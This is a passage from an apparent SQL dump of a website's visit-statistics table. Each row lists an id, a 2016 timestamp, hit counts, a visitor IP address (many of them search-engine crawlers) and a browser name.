irefox'),(57118,1471505693,1,0,1,0,'66.249.76.112',''),(57119,1471505886,1,1,0,0,'46.200.127.155','opera'),(57120,1471506009,1,1,0,0,'91.196.178.97','chrome'),(57121,1471506311,1,1,0,0,'66.102.9.103','chrome'),(57122,1471506341,1,0,1,0,'66.249.76.108',''),(57123,1471506392,1,1,0,0,'95.135.89.199','firefox'),(57124,1471506630,1,1,0,0,'164.132.161.67','other'),(57125,1471506635,1,1,0,0,'51.255.65.68','other'),(57126,1471507098,1,1,0,0,'51.255.65.53','other'),(57127,1471507263,2,0,2,0,'66.249.76.114',''),(57128,1471507614,1,1,0,0,'91.196.178.66','firefox'),(57129,1471507886,1,1,0,0,'46.201.255.46','chrome'),(57130,1471508107,1,1,0,0,'91.197.220.240','chrome'),(57131,1471508353,1,1,0,0,'151.80.31.168','other'),(57132,1471508484,1,1,0,0,'51.255.65.72','other'),(57133,1471508714,1,1,0,0,'164.132.161.9','other'),(57134,1471509605,1,0,1,0,'66.249.76.112',''),(57135,1471509989,1,0,1,0,'66.249.66.180',''),(57136,1471510655,1,1,0,0,'151.80.31.164','other'),(57137,1471510972,1,1,0,0,'51.255.65.29','other'),(57138,1471511343,1,0,1,0,'66.249.76.113',''),(57139,1471512035,1,1,0,0,'31.128.100.166','chrome'),(57140,1471512535,1,1,0,0,'37.53.89.22','chrome'),(57141,1471512848,1,1,0,0,'51.255.65.5','other'),(57142,1471513234,1,1,0,0,'91.196.178.97','chrome'),(57143,1471513241,1,1,0,0,'37.117.101.24','chrome'),(57144,1471514037,1,1,0,0,'95.135.89.199','firefox'),(57145,1471514270,1,1,0,0,'51.255.65.34','other'),(57146,1471515119,1,1,0,0,'157.55.39.34','other'),(57147,1471515252,1,1,0,0,'164.132.161.89','other'),(57148,1471516623,1,0,1,0,'66.249.76.108',''),(57149,1471516679,1,1,0,0,'207.46.13.9','other'),(57150,1471516776,1,1,0,0,'51.255.65.69','other'),(57151,1471516897,1,1,0,0,'164.132.161.44','other'),(57152,1471517354,1,1,0,0,'178.92.224.232','firefox'),(57153,1471517382,1,1,0,0,'141.8.142.58','other'),(57154,1471517446,1,1,0,0,'51.255.65.46','other'),(57155,1471517678,1,1,0,0,'37.53.224.237','chrome'),(57156,1471517692,1,1,0,0,'130.193.51.19','other'),(57157,1471518099,2,0,2,0,'66.249.76.113',''),(57158,1471519768,1,1,0,0,'66.102.9.83','chrome'),(57159,1471520000,1,1,0,0,'107.21.1.8','other'),(57160,1471520381,1,0,1,0,'66.249.76.109',''),(57161,1471520420,1,0,1,0,'66.249.66.183',''),(57162,1471520843,1,1,0,0,'51.255.65.62','other'),(57163,1471521097,1,1,0,0,'151.80.31.162','other'),(57164,1471522036,1,1,0,0,'164.132.161.31','other'),(57165,1471522639,1,1,0,0,'151.80.31.109','other'),(57166,1471523061,1,1,0,0,'91.196.178.133','chrome'),(57167,1471523253,1,1,0,0,'95.135.89.199','firefox'),(57168,1471523491,1,1,0,0,'91.196.178.66','firefox'),(57169,1471524039,1,1,0,0,'77.52.77.77','chrome'),(57170,1471524274,1,0,1,0,'66.249.76.113',''),(57171,1471524550,1,1,0,0,'37.53.89.22','chrome'),(57172,1471525438,1,1,0,0,'94.179.9.80','firefox'),(57173,1471526248,1,1,0,0,'95.135.89.199','firefox'),(57174,1471526829,1,0,1,0,'66.249.76.112',''),(57175,1471526945,1,1,0,0,'207.46.13.131','other'),(57176,1471527345,1,1,0,0,'66.249.93.117','chrome'),(57177,1471527484,1,1,0,0,'91.244.12.84','chrome'),(57178,1471527615,1,1,0,0,'95.135.89.199','firefox'),(57179,1471527755,1,0,1,0,'66.249.76.114',''),(57180,1471527937,1,1,0,0,'46.200.144.249','chrome'),(57181,1471528606,1,1,0,0,'95.135.89.199','firefox'),(57182,1471528711,1,1,0,0,'95.134.61.77','firefox'),(57183,1471528784,1,0,1,0,'66.249.76.114',''),(57184,1471528972,1,1,0,0,'82.145.222.132','other'),(57185,1471529949,1,0,1,0,'66.249.66.180',''),(57186,1471530031,1,0,1,0,'66.249.76.114',''),(57187,1471530396,1,0,1,0,'66.249.66.182',''),(57188,1471531038,1,1,0,0,'103.62.141.22','firefox'),(57189,1471531175,2,0,2,0,'66.249.76.112',''),(57190,1471531227,1,0,1,0,'66.249.76.113',''),(57191,1471531512,2,2,0,0,'95.135.89.199','firefox'),(57192,1471531731,1,1,0,0,'91.195.156.46','firefox'),(57193,1471531810,1,1,0,0,'91.196.178.65','firefox'),(57194,1471532682,1,1,0,0,'164.132.161.65','other'),(57195,1471533961,1,0,1,0,'66.249.76.108',''),(57196,1471534658,1,1,0,0,'204.79.180.211','msie'),(57197,1471534759,1,1,0,0,'164.132.161.90','other'),(57198,1471534975,1,1,0,0,'164.132.161.75','other'),(57199,1471535070,1,0,1,0,'66.249.66.185',''),(57200,1471535077,1,0,1,0,'66.249.76.107',''),(57201,1471535472,1,1,0,0,'91.196.178.38','firefox'),(57202,1471535771,1,1,0,0,'151.80.31.100','other'),(57203,1471535773,1,1,0,0,'164.132.161.60','other'),(57204,1471535959,1,1,0,0,'37.52.1.246','chrome'),(57205,1471536156,1,0,1,0,'66.249.66.182',''),(57206,1471536371,1,1,0,0,'130.193.51.79','other'),(57207,1471536394,1,1,0,0,'5.255.253.67','other'),(57208,1471536493,1,1,0,0,'78.111.189.176','chrome'),(57209,1471537093,1,0,1,0,'66.249.76.109',''),(57210,1471537233,1,1,0,0,'164.132.161.21','other'),(57211,1471537334,1,1,0,0,'151.80.31.158','other'),(57212,1471537469,1,1,0,0,'164.132.161.84','other'),(57213,1471537539,1,0,1,0,'66.249.76.113',''),(57214,1471538267,1,1,0,0,'51.255.65.61','other'),(57215,1471538495,1,0,1,0,'66.249.76.114',''),(57216,1471538990,1,1,0,0,'157.55.39.34','other'),(57217,1471539008,1,0,1,0,'66.249.76.113',''),(57218,1471539304,2,2,0,0,'91.196.178.40','firefox'),(57219,1471539359,1,1,0,0,'51.255.65.81','other'),(57220,1471539845,1,1,0,0,'51.255.65.97','other'),(57221,1471540032,1,1,0,0,'164.132.161.73','other'),(57222,1471540041,1,0,1,0,'66.249.76.113',''),(57223,1471540437,1,0,1,0,'66.249.76.109',''),(57224,1471540770,1,1,0,0,'151.80.31.182','other'),(57225,1471541251,1,1,0,0,'141.8.183.25','other'),(57226,1471541256,1,1,0,0,'93.158.152.84','other'),(57227,1471541597,1,1,0,0,'51.255.65.29','other'),(57228,1471542019,1,1,0,0,'51.255.65.86','other'),(57229,1471542395,1,1,0,0,'51.255.65.50','other'),(57230,1471543129,1,1,0,0,'151.80.31.104','other'),(57231,1471543276,1,1,0,0,'51.255.65.11','other'),(57232,1471543517,1,1,0,0,'151.80.31.180','other'),(57233,1471544372,1,1,0,0,'51.255.65.62','other'),(57234,1471544528,1,1,0,0,'130.193.50.34','other'),(57235,1471544529,1,1,0,0,'141.8.142.67','other'),(57236,1471545195,1,1,0,0,'91.196.178.165','firefox'),(57237,1471545304,1,0,1,0,'66.249.76.114',''),(57238,1471546085,1,1,0,0,'164.132.161.2','other'),(57239,1471546348,1,0,1,0,'66.249.66.182',''),(57240,1471546653,1,1,0,0,'66.249.76.112','chrome'),(57241,1471546695,1,1,0,0,'164.132.161.25','other'),(57242,1471546824,1,1,0,0,'164.132.161.45','other'),(57243,1471546872,1,1,0,0,'66.249.76.113','chrome'),(57244,1471547328,1,1,0,0,'51.255.65.38','other'),(57245,1471547536,1,1,0,0,'164.132.161.27','other'),(57246,1471547896,1,1,0,0,'66.249.76.114','chrome'),(57247,1471548208,1,1,0,0,'164.132.161.15','other'),(57248,1471548316,1,1,0,0,'164.132.161.7','other'),(57249,1471548402,1,1,0,0,'176.77.115.99','opera'),(57251,1471548403,1,1,0,0,'46.242.121.64','firefox'),(57252,1471548404,1,1,0,0,'2.93.241.91','chrome'),(57253,1471548405,1,1,0,0,'5.164.65.74','chrome'),(57254,1471548656,1,1,0,0,'51.255.65.17','other'),(57255,1471549056,1,0,1,0,'66.249.76.108',''),(57256,1471549228,1,1,0,0,'193.194.127.219','other'),(57257,1471549778,1,1,0,0,'151.80.31.167','other'),(57258,1471550542,1,0,1,0,'66.249.76.114',''),(57259,1471550748,1,0,1,0,'66.249.76.113',''),(57260,1471550750,1,1,0,0,'151.80.31.101','other'),(57261,1471551196,1,1,0,0,'141.8.142.58','other'),(57262,1471551197,1,1,0,0,'130.193.50.34','other'),(57263,1471552214,1,1,0,0,'51.255.65.61','other'),(57264,1471552291,1,1,0,0,'164.132.161.31','other'),(57265,1471554028,1,0,1,0,'66.249.76.112',''),(57266,1471554356,1,1,0,0,'180.76.15.18','other'),(57267,1471554498,1,1,0,0,'164.132.161.68','other'),(57268,1471555658,1,1,0,0,'66.249.76.107','chrome'),(57269,1471555855,1,1,0,0,'141.8.142.58','other'),(57270,1471555856,1,1,0,0,'130.193.51.19','other'),(57271,1471555952,1,1,0,0,'66.249.76.113','chrome'),(57272,1471556021,1,1,0,0,'51.255.65.30','other'),(57273,1471556357,1,1,0,0,'141.0.13.247','other'),(57274,1471556540,1,0,1,0,'66.249.76.112',''),(57275,1471557357,1,1,0,0,'164.132.161.31','other'),(57276,1471557779,1,1,0,0,'51.255.65.78','other'),(57277,1471558341,1,0,1,0,'66.249.76.114',''),(57278,1471558751,1,0,1,0,'66.249.76.112',''),(57279,1471558969,1,1,0,0,'51.255.65.35','other'),(57280,1471559169,1,1,0,0,'164.132.161.86','other'),(57281,1471559176,1,1,0,0,'51.255.65.46','other'),(57282,1471560589,1,1,0,0,'51.255.65.40','other'),(57283,1471560683,1,0,1,0,'66.249.76.112',''),(57284,1471560857,1,1,0,0,'51.255.65.15','other'),(57285,1471560976,1,1,0,0,'164.132.161.95','other'),(57286,1471561229,1,1,0,0,'164.132.161.54','other'),(57287,1471561695,1,1,0,0,'207.46.13.131','other'),(57288,1471561984,1,1,0,0,'164.132.161.13','other'),(57289,1471562116,1,1,0,0,'130.193.50.34','other'),(57290,1471562396,1,1,0,0,'51.255.65.7','other'),(57291,1471562562,1,1,0,0,'151.80.31.181','other'),(57292,1471562706,1,0,1,0,'66.249.76.114',''),(57293,1471563010,1,0,1,0,'66.249.76.107',''),(57294,1471563417,1,0,1,0,'66.249.66.182',''),(57295,1471564107,1,1,0,0,'51.255.65.81','other'),(57296,1471564195,1,1,0,0,'151.80.31.102','other'),(57297,1471564663,1,1,0,0,'151.80.31.183','other'),(57298,1471565276,1,0,1,0,'66.249.76.112',''),(57299,1471565732,1,1,0,0,'130.193.50.34','other'),(57300,1471566011,1,1,0,0,'93.158.152.46','other'),(57301,1471566027,1,1,0,0,'130.193.37.7','other'),(57302,1471566249,1,1,0,0,'141.8.142.58','other'),(57303,1471566333,1,1,0,0,'141.8.183.25','other'),(57304,1471566356,1,1,0,0,'93.158.152.84','other'),(57305,1471566522,2,2,0,0,'195.154.185.20','other'),(57306,1471567309,1,1,0,0,'141.8.183.25','other'),(57307,1471568165,1,0,1,0,'66.249.76.114',''),(57308,1471568534,1,1,0,0,'141.8.142.78','other'),(57309,1471568535,1,1,0,0,'141.8.183.19','other'),(57310,1471568538,1,1,0,0,'93.158.152.40','other'),(57311,1471568800,1,1,0,0,'141.8.142.61','other'),(57312,1471568806,1,1,0,0,'141.8.183.14','other'),(57313,1471568809,1,1,0,0,'141.8.142.25','other'),(57314,1471569190,1,1,0,0,'141.8.142.58','other'),(57315,1471569291,40,40,0,0,'62.221.70.154','chrome'),(57316,1471569443,1,0,1,0,'66.249.76.112',''),(57317,1471569475,1,1,0,0,'207.46.13.9','other'),(57318,1471570012,1,0,1,0,'66.249.76.108',''),(57319,1471570667,1,1,0,0,'141.8.183.14','other'),(57321,1471570787,1,0,1,0,'66.249.66.188',''),(57322,1471570792,2,0,2,0,'66.249.76.112',''),(57323,1471572418,1,1,0,0,'141.8.183.19','other'),(57324,1471572624,1,1,0,0,'180.76.15.11','other'),(57325,1471573726,1,1,0,0,'130.193.50.34','other'),(57326,1471573856,1,1,0,0,'141.8.183.25','other'),(57327,1471574247,1,0,1,0,'66.249.66.183',''),(57328,1471574438,1,0,1,0,'66.249.76.112',''),(57329,1471575952,1,1,0,0,'130.193.51.19','other'),(57330,1471576710,2,2,0,0,'130.193.50.34','other'),(57331,1471577864,1,1,0,0,'130.193.50.34','other'),(57332,1471578192,4,4,0,0,'91.121.86.136','other'),(57333,1471578323,1,1,0,0,'51.255.65.90','other'),(57334,1471578623,1,1,0,0,'51.255.65.32','other'),(57335,1471578865,1,1,0,0,'164.132.161.33','other'),(57336,1471579648,1,1,0,0,'130.193.51.79','other'),(57337,1471579966,2,2,0,0,'141.8.183.25','other'),(57338,1471580321,16,16,0,0,'62.221.70.154','chrome'),(57339,1471580415,1,1,0,0,'164.132.161.63','other'),(57340,1471580437,1,1,0,0,'51.255.65.96','other'),(57341,1471580562,2,0,2,0,'66.249.76.113',''),(57342,1471580621,4,4,0,0,'130.193.50.34','other'),(57343,1471580847,2,2,0,0,'130.193.51.19','other'),(57344,1471580906,1,0,1,0,'66.249.76.107',''),(57345,1471580987,2,2,0,0,'141.8.183.25','other'),(57346,1471581154,1,1,0,0,'51.254.103.60','other'),(57347,1471581334,1,1,0,0,'141.8.142.58','other'),(57348,1471581519,1,1,0,0,'66.249.66.188','chrome'),(57349,1471582033,1,1,0,0,'164.132.161.88','other'),(57350,1471583046,2,2,0,0,'66.249.76.112','chrome'),(57351,1471583260,1,1,0,0,'141.8.183.25','other'),(57352,1471583509,1,1,0,0,'78.154.160.206','chrome'),(57353,1471583657,1,1,0,0,'141.8.142.58','other'),(57354,1471583782,1,1,0,0,'141.8.132.10','other'),(57355,1471583783,1,1,0,0,'130.193.51.19','other'),(57356,1471584006,1,1,0,0,'66.249.66.188','chrome'),(57357,1471584028,1,1,0,0,'66.249.66.182','chrome'),(57358,1471584212,1,1,0,0,'66.249.76.112','chrome'),(57359,1471584230,2,1,1,0,'66.249.66.185',''),(57360,1471584314,1,1,0,0,'66.249.66.177','chrome'),(57361,1471584734,1,1,0,0,'51.255.65.47','other'),(57362,1471584842,3,3,0,0,'130.193.50.34','other'),(57363,1471585159,1,1,0,0,'92.113.189.52','firefox'),(57364,1471585289,1,1,0,0,'51.255.65.29','other'),(57365,1471585556,2,2,0,0,'130.193.51.19','other'),(57366,1471585986,1,1,0,0,'91.196.178.67','firefox'),(57367,1471586688,1,1,0,0,'141.8.183.25','other'),(57368,1471586768,1,1,0,0,'37.53.230.13','firefox'),(57369,1471587440,1,0,1,0,'66.249.76.112',''),(57370,1471588018,1,1,0,0,'141.8.183.25','other'),(57371,1471588141,3,3,0,0,'130.193.50.34','other'),(57372,1471588382,3,3,0,0,'130.193.51.19','other'),(57373,1471589141,1,1,0,0,'130.193.50.34','other'),(57374,1471589402,1,0,1,0,'66.249.66.185',''),(57375,1471589708,1,1,0,0,'40.77.167.38','other'),(57376,1471590319,1,1,0,0,'130.193.51.19','other'),(57377,1471590398,1,1,0,0,'46.201.240.112','firefox'),(57378,1471590479,1,0,1,0,'66.249.66.182',''),(57379,1471590765,1,1,0,0,'91.196.178.161','chrome'),(57380,1471591063,1,1,0,0,'80.249.234.236','chrome'),(57381,1471591100,1,1,0,0,'91.196.178.67','firefox'),(57382,1471591263,2,2,0,0,'141.8.183.25','other'),(57383,1471591444,2,0,2,0,'66.249.76.112',''),(57384,1471591716,1,1,0,0,'66.249.83.247','chrome'),(57385,1471591734,2,2,0,0,'130.180.208.14','firefox'),(57386,1471591839,1,1,0,0,'82.207.124.176','chrome'),(57387,1471591905,1,1,0,0,'130.193.50.34','other'),(57388,1471592698,2,2,0,0,'62.210.97.48','other'),(57389,1471592997,1,1,0,0,'66.249.76.113','chrome'),(57390,1471593461,1,1,0,0,'157.55.39.34','other'),(57391,1471593472,1,1,0,0,'66.249.76.114','chrome'),(57392,1471593976,2,2,0,0,'141.8.142.67','other'),(57393,1471594343,3,3,0,0,'141.8.183.25','other'),(57394,1471594843,1,1,0,0,'130.193.50.34','other'),(57395,1471595021,1,1,0,0,'130.180.217.35','chrome'),(57396,1471595028,1,1,0,0,'130.193.51.19','other'),(57397,1471595113,1,1,0,0,'91.196.177.26','firefox'),(57398,1471595290,1,0,1,0,'66.249.76.113',''),(57399,1471595929,1,1,0,0,'37.53.230.13','firefox'),(57400,1471596522,2,0,2,0,'66.249.76.112',''),(57401,1471596556,1,0,1,0,'66.249.76.108',''),(57402,1471596628,1,1,0,0,'91.196.178.161','chrome'),(57403,1471596658,3,3,0,0,'141.8.183.25','other'),(57404,1471597190,1,1,0,0,'130.193.50.34','other'),(57405,1471597191,1,1,0,0,'141.8.142.58','other'),(57406,1471597260,1,1,0,0,'130.193.51.19','other'),(57407,1471597497,1,1,0,0,'91.196.178.70','chrome'),(57408,1471597663,1,1,0,0,'46.201.175.251','chrome'),(57409,1471598840,1,1,0,0,'37.53.230.13','firefox'),(57410,1471598974,1,1,0,0,'213.192.10.47','firefox'),(57411,1471599214,1,0,1,0,'66.249.76.109',''),(57412,1471599400,1,1,0,0,'91.196.178.66','firefox'),(57413,1471599417,1,0,1,0,'66.249.76.113',''),(57414,1471599453,1,0,1,0,'66.249.66.183',''),(57415,1471599457,3,0,3,0,'66.249.76.114',''),(57416,1471599566,5,0,5,0,'66.249.76.107',''),(57417,1471599604,6,0,6,0,'66.249.76.112',''),(57418,1471599906,1,0,1,0,'66.249.66.185',''),(57419,1471600761,1,1,0,0,'40.77.167.38','other'),(57420,1471600959,1,1,0,0,'92.113.146.66','chrome'),(57421,1471601193,2,0,2,0,'66.249.76.107',''),(57422,1471601201,1,0,1,0,'66.249.76.108',''),(57423,1471601248,1,0,1,0,'66.249.66.185',''),(57424,1471601260,2,0,2,0,'66.249.76.112',''),(57425,1471601293,2,2,0,0,'130.193.50.34','other'),(57426,1471601424,1,0,1,0,'66.249.76.114',''),(57427,1471601846,2,2,0,0,'130.193.51.19','other'),(57428,1471602255,3,3,0,0,'141.8.183.25','other'),(57429,1471602257,1,1,0,0,'130.193.50.34','other'),(57430,1471602667,1,1,0,0,'178.154.149.11','other'),(57431,1471602988,1,1,0,0,'37.53.200.248','chrome'),(57432,1471603240,1,0,1,0,'66.249.76.108',''),(57433,1471604419,1,1,0,0,'66.249.76.112','chrome'),(57434,1471604709,1,1,0,0,'91.196.178.72','chrome'),(57435,1471604715,1,1,0,0,'130.193.37.21','other'),(57436,1471605035,1,0,1,0,'66.249.76.114',''),(57437,1471605668,1,1,0,0,'159.224.221.201','chrome'),(57438,1471606675,1,1,0,0,'212.1.94.170','chrome'),(57439,1471606885,1,1,0,0,'66.249.76.114','chrome'),(57440,1471606905,1,1,0,0,'178.255.215.94','other'),(57441,1471607410,6,6,0,0,'51.254.143.240','other'),(57442,1471607491,1,1,0,0,'91.196.177.101','chrome'),(57443,1471608094,1,1,0,0,'91.196.178.67','firefox'),(57444,1471609900,2,2,0,0,'91.196.179.138','firefox'),(57445,1471610000,1,0,1,0,'66.249.76.113',''),(57446,1471610503,1,1,0,0,'134.249.60.41','chrome'),(57447,1471611207,1,1,0,0,'94.179.26.106','chrome'),(57448,1471611675,1,0,1,0,'66.249.66.188',''),(57449,1471612179,1,1,0,0,'141.8.183.25','other'),(57450,1471612181,3,3,0,0,'130.193.50.34','other'),(57451,1471612404,1,1,0,0,'207.46.13.131','other'),(57452,1471613219,1,0,1,0,'66.249.76.112',''),(57453,1471613426,1,1,0,0,'66.249.66.182','chrome'),(57454,1471613954,1,1,0,0,'62.30.157.162','firefox'),(57455,1471614171,1,1,0,0,'37.53.230.13','firefox'),(57456,1471614651,1,1,0,0,'141.8.183.25','other'),(57457,1471614652,1,1,0,0,'141.8.142.58','other'),(57458,1471614853,1,1,0,0,'207.46.13.131','other'),(57459,1471615786,1,1,0,0,'130.193.51.19','other'),(57460,1471615806,1,1,0,0,'130.193.50.34','other'),(57461,1471615839,1,0,1,0,'66.249.76.108',''),(57462,1471615922,1,0,1,0,'66.249.76.112',''),(57463,1471616249,1,0,1,0,'66.249.76.114',''),(57464,1471616378,1,1,0,0,'66.249.76.113','chrome'),(57465,1471617416,1,0,1,0,'66.249.76.113',''),(57466,1471617496,1,1,0,0,'94.179.6.209','chrome'),(57467,1471617727,2,2,0,0,'141.8.183.25','other'),(57468,1471617747,1,0,1,0,'66.249.76.114',''),(57469,1471618102,1,1,0,0,'66.249.66.185','chrome'),(57470,1471618641,1,1,0,0,'66.249.76.113','chrome'),(57471,1471618735,2,2,0,0,'141.8.183.25','other'),(57472,1471620004,2,2,0,0,'130.193.51.19','other'),(57473,1471620797,1,1,0,0,'141.8.132.30','other'),(57474,1471620798,1,1,0,0,'130.193.51.74','other'),(57475,1471621340,1,0,1,0,'66.249.66.185',''),(57476,1471621343,1,0,1,0,'66.249.76.113',''),(57477,1471621358,1,0,1,0,'66.249.76.112',''),(57478,1471621756,1,1,0,0,'94.76.121.15','other'),(57479,1471621868,2,2,0,0,'141.8.183.25','other'),(57480,1471621919,1,1,0,0,'66.102.9.93','chrome'),(57481,1471622043,1,0,1,0,'66.249.76.109',''),(57482,1471622280,1,1,0,0,'66.249.66.180','chrome'),(57483,1471622818,2,0,2,0,'66.249.76.114',''),(57484,1471623527,1,1,0,0,'66.249.76.112','chrome'),(57485,1471624218,2,2,0,0,'130.193.50.34','other'),(57486,1471624241,1,0,1,0,'66.249.76.114',''),(57487,1471624919,1,0,1,0,'66.249.66.188',''),(57488,1471624938,1,0,1,0,'66.249.66.185',''),(57489,1471624949,1,1,0,0,'130.193.51.19','other'),(57490,1471625157,2,2,0,0,'130.193.50.34','other'),(57491,1471626039,1,1,0,0,'157.55.39.34','other'),(57492,1471626451,1,1,0,0,'141.8.183.25','other'),(57493,1471627000,1,1,0,0,'207.46.13.131','other'),(57494,1471627374,1,0,1,0,'66.249.76.113',''),(57495,1471628297,1,1,0,0,'91.244.12.84','chrome'),(57496,1471628636,1,0,1,0,'66.249.66.182',''),(57497,1471629117,1,0,1,0,'66.249.76.113',''),(57498,1471629368,1,1,0,0,'93.158.152.40','other'),(57499,1471629516,1,1,0,0,'141.8.142.10','other'),(57500,1471630576,1,0,1,0,'66.249.66.183',''),(57501,1471630995,1,1,0,0,'130.193.51.43','other'),(57502,1471631295,1,1,0,0,'66.249.76.109','chrome'),(57503,1471631535,2,2,0,0,'173.234.159.250','other'),(57504,1471635186,1,1,0,0,'93.158.152.9','other'),(57505,1471635189,1,1,0,0,'141.8.132.2','other'),(57506,1471635192,1,1,0,0,'130.193.37.21','other'),(57507,1471636095,1,1,0,0,'130.193.51.79','other'),(57508,1471636179,1,0,1,0,'66.249.66.188',''),(57509,1471636180,1,1,0,0,'37.54.114.52','chrome'),(57510,1471636199,1,1,0,0,'130.193.50.6','other'),(57511,1471637859,1,1,0,0,'37.54.114.52','chrome'),(57512,1471637873,1,0,1,0,'66.249.76.113',''),(57513,1471639066,1,0,1,0,'66.249.66.182',''),(57514,1471639114,1,1,0,0,'180.76.15.29','other'),(57515,1471639240,1,0,1,0,'66.249.76.107',''),(57516,1471639746,2,2,0,0,'130.193.50.34','other'),(57517,1471639855,1,0,1,0,'66.249.66.180',''),(57518,1471639866,1,1,0,0,'141.8.183.25','other'),(57519,1471640524,1,1,0,0,'130.193.51.19','other'),(57520,1471641096,1,0,1,0,'66.249.66.185',''),(57521,1471641553,2,2,0,0,'130.193.50.34','other'),(57522,1471641737,1,0,1,0,'66.249.76.109',''),(57523,1471642184,1,1,0,0,'157.55.39.34','other'),(57524,1471642363,1,1,0,0,'141.8.183.25','other'),(57525,1471642813,2,2,0,0,'130.193.50.34','other'),(57526,1471643782,1,0,1,0,'66.249.76.113',''),(57527,1471643924,1,0,1,0,'66.249.76.114',''),(57528,1471645439,1,1,0,0,'141.8.183.25','other'),(57529,1471645626,1,0,1,0,'66.249.66.81',''),(57530,1471645949,1,1,0,0,'193.107.108.161','chrome'),(57531,1471646413,1,1,0,0,'141.8.183.25','other'),(57532,1471647315,1,0,1,0,'66.249.76.61',''),(57533,1471647692,1,0,1,0,'66.249.76.81',''),(57534,1471648322,1,1,0,0,'130.193.51.19','other'),(57535,1471649561,1,1,0,0,'107.208.96.36','firefox'),(57536,1471650282,1,1,0,0,'130.193.50.34','other'),(57537,1471651597,1,1,0,0,'207.46.13.9','other'),(57538,1471652158,3,3,0,0,'95.5.202.38','other'),(57539,1471652323,1,1,0,0,'130.193.51.19','other'),(57540,1471652324,3,3,0,0,'130.193.50.34','other'),(57541,1471652654,2,2,0,0,'141.8.183.25','other'),(57542,1471653600,3,3,0,0,'130.193.50.34','other'),(57543,1471653617,2,2,0,0,'141.8.183.25','other'),(57544,1471653815,1,0,1,0,'66.249.76.81',''),(57545,1471654012,1,0,1,0,'66.249.76.61',''),(57546,1471654629,3,3,0,0,'141.8.183.25','other'),(57547,1471655164,1,1,0,0,'178.255.215.94','other'),(57548,1471655799,4,4,0,0,'141.8.183.25','other'),(57549,1471656958,4,4,0,0,'130.193.50.34','other'),(57550,1471657544,2,2,0,0,'130.193.51.19','other'),(57551,1471658926,1,1,0,0,'130.193.51.19','other'),(57552,1471659256,1,0,1,0,'66.249.76.81',''),(57553,1471661196,3,0,3,0,'66.249.76.62',''),(57554,1471661199,1,0,1,0,'66.249.76.60',''),(57555,1471661299,1,0,1,0,'66.249.76.61',''),(57556,1471662342,1,0,1,0,'66.249.66.81',''),(57557,1471662473,1,0,1,0,'66.249.66.84',''),(57558,1471662631,1,0,1,0,'66.249.66.87',''),(57559,1471663461,1,0,1,0,'66.249.76.60',''),(57560,1471663464,1,0,1,0,'66.249.76.61',''),(57561,1471663492,3,3,0,0,'141.8.183.25','other'),(57562,1471663493,2,2,0,0,'130.193.50.34','other'),(57563,1471663592,1,0,1,0,'66.249.76.79',''),(57564,1471663991,1,0,1,0,'66.249.76.62',''),(57565,1471664046,1,1,0,0,'141.8.142.58','other'),(57566,1471664940,1,0,1,0,'66.249.76.61',''),(57567,1471665831,1,0,1,0,'66.249.76.81',''),(57568,1471665862,1,0,1,0,'66.249.76.61',''),(57569,1471666808,1,1,0,0,'157.55.39.112','other'),(57570,1471667125,2,2,0,0,'130.193.50.34','other'),(57571,1471667387,1,0,1,0,'66.249.76.60',''),(57572,1471668187,1,1,0,0,'141.8.142.62','other'),(57573,1471668191,1,1,0,0,'93.158.152.84','other'),(57574,1471669007,1,1,0,0,'93.158.152.26','other'),(57575,1471669011,1,1,0,0,'5.255.253.30','other'),(57576,1471669015,1,1,0,0,'93.158.152.75','other'),(57577,1471669393,1,0,1,0,'66.249.66.81',''),(57578,1471670253,1,1,0,0,'5.255.253.53','other'),(57579,1471670254,1,1,0,0,'130.193.51.45','other'),(57580,1471670329,1,0,1,0,'66.249.76.60',''),(57581,1471670359,1,1,0,0,'93.158.152.26','other'),(57582,1471670360,1,1,0,0,'141.8.184.22','other'),(57583,1471670518,2,2,0,0,'130.193.50.34','other'),(57584,1471671433,2,2,0,0,'130.193.50.34','other'),(57585,1471672169,4,1,3,0,'66.249.76.60',''),(57586,1471672438,4,4,0,0,'174.34.135.242','other'),(57587,1471672735,1,0,1,0,'66.249.76.62',''),(57588,1471672745,1,0,1,0,'66.249.66.84',''),(57589,1471672758,1,0,1,0,'66.249.76.61',''),(57590,1471673088,1,1,0,0,'207.46.13.131','other'),(57591,1471674020,1,1,0,0,'130.193.50.34','other'),(57592,1471674025,1,1,0,0,'130.193.51.19','other'),(57593,1471674089,1,0,1,0,'66.249.66.81',''),(57594,1471675003,1,0,1,0,'66.249.76.61',''),(57595,1471675004,1,0,1,0,'66.249.76.62',''),(57596,1471675527,1,0,1,0,'66.249.76.60',''),(57597,1471675994,1,0,1,0,'66.249.66.87',''),(57598,1471676225,1,1,0,0,'141.0.12.35','other'),(57599,1471676887,10,10,0,0,'95.158.189.118','other'),(57600,1471677875,6,6,0,0,'95.158.189.118','other'),(57601,1471677960,1,1,0,0,'130.193.37.21','other'),(57602,1471677961,1,1,0,0,'5.255.253.9','other'),(57603,1471678220,1,1,0,0,'66.249.93.117','chrome'),(57604,1471678783,5,5,0,0,'95.158.189.118','other'),(57605,1471679526,2,0,2,0,'66.249.76.62',''),(57606,1471679623,1,1,0,0,'91.196.178.38','firefox'),(57607,1471679999,5,5,0,0,'95.158.189.118','other'),(57608,1471680767,1,0,1,0,'66.249.76.62',''),(57609,1471680972,5,5,0,0,'95.158.189.118','other'),(57610,1471681028,1,0,1,0,'66.249.76.61',''),(57611,1471682862,2,2,0,0,'141.8.142.67','other'),(57612,1471683054,1,0,1,0,'66.249.76.60',''),(57613,1471683301,1,1,0,0,'141.8.132.30','other'),(57614,1471683302,1,1,0,0,'93.158.152.75','other'),(57615,1471683633,8,8,0,0,'95.158.189.118','other'),(57616,1471683742,1,1,0,0,'141.8.132.10','other'),(57617,1471683745,1,1,0,0,'93.158.152.9','other'),(57618,1471684549,7,7,0,0,'95.158.189.118','other'),(57619,1471684821,1,0,1,0,'66.249.66.87',''),(57620,1471685682,1,0,1,0,'66.249.76.81',''),(57621,1471685770,1,1,0,0,'89.178.113.115','firefox'),(57622,1471686340,1,1,0,0,'176.193.215.204','firefox'),(57623,1471686497,1,1,0,0,'176.195.187.129','chrome'),(57624,1471687490,1,1,0,0,'37.110.109.160','opera'),(57625,1471687706,1,1,0,0,'188.32.128.49','chrome'),(57626,1471688051,1,0,1,0,'66.249.76.62',''),(57627,1471688507,2,0,2,0,'66.249.76.61',''),(57628,1471688516,1,0,1,0,'66.249.66.84',''),(57629,1471688534,1,0,1,0,'66.249.76.60',''),(57630,1471691458,2,2,0,0,'81.109.65.38','other'),(57631,1471691653,1,0,1,0,'66.249.76.61',''),(57632,1471691956,68,68,0,0,'108.59.8.70','other'),(57633,1471694120,1,0,1,0,'66.249.76.60',''),(57634,1471694892,1,1,0,